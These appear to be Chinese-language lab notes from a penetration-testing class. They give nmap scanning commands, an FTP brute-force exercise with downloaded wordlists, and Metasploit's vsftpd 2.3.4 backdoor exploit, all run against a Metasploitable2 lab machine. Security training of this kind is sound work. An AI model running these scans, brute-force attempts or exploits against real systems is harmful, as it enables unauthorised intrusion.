# 108 常見自動化工具介紹與實務操作 (10/17) ###### tags: `LZ` --- Kali Linux 無法複製、貼上 == ```shell # 安裝VM Tools apt-get install open-vm-tools-desktop # 重新啟動服務 systemctl restart vmware-tools ``` 開啟http server == ```shell python -m SimpleHTTPServer 80 nmap -sS -p 80 localhost ``` Nmap == ## 基本掃描 \# nmap [ip] ## 主機掃描 \# nmap -sn [ip/submask] ## 快速掃描 \# nmap -F [ip] ## 掃描服務版本 \# nmap -Pn -sS -sV -p [port] [ip] ## 輸出除錯和掃描詳細訊息 \# nmap -Pn -sS -sV -dd -vv -p [port] [ip] ## 掃描連接埠 ### 所有連接埠 \# nmap -Pn -sS -p- [ip] -oN tcp_all.nmap \# nmap -Pn -sS -p 0-65535 [ip] ### 常見連接埠 ### TCP \# nmap -Pn -sS --top-port 100 [ip] ### UDP \# nmap -Pn -sU --top-port 100 [ip] ## Script 存放目錄 /usr/share/nmap/scripts/ ## Script 類型定義 /usr/share/nmap/scripts/script.db ## Script type scan \# nmap -Pn -sS -p ftp --script vuln [ip] ## 10/24 練習一 #### brute類型script掃描指令範例 \# nmap -sS -sV -p ftp --script brute [ip] #### vuln類型script掃描指令範例 \# nmap -sS -sV -p ftp --script vuln [ip] ## 10/24 練習二 ### 帳號密碼檔 #### 下載user.txt指令 \# wget --no-check-certificate "https://drive.google.com/uc?export=download&id=1XhhgvVdz88Z1HFzqajiOejM4-T8TeWbf" -O user.txt #### 下載passwd.txt指令 \# wget --no-check-certificate "https://drive.google.com/uc?export=download&id=1M1UwrlOKIr-sprTYMTrXQtyR5yzaz9SJ" -O passwd.txt #### 使用nmap的ftp-brute script對metasploitable2的FTP服務執行暴力破解，搭配我們自己的username及password資料檔 \# nmap -sS -p ftp --script ftp-brute --script-args passdb=~/passwd.txt --script-args userdb=~/user.txt [ip] Username https://drive.google.com/open?id=1XhhgvVdz88Z1HFzqajiOejM4-T8TeWbf Password https://drive.google.com/open?id=1M1UwrlOKIr-sprTYMTrXQtyR5yzaz9SJ ## 10/24練習三 #### 更新searchsploit資料庫 \# searchsploit -u #### 透過searchsploit尋找exploit-db上的PoC \# searchsploit vsftpd 2.3.4 #### 使用Metasplot Framework驗證漏洞 \# msfconsole -q ms5> search vsftpd ms5> use exploit/unix/ftp/vsftpd_234_backdoor ms5> show options ms5> set RHOSTS [ip] ms5> exploit ---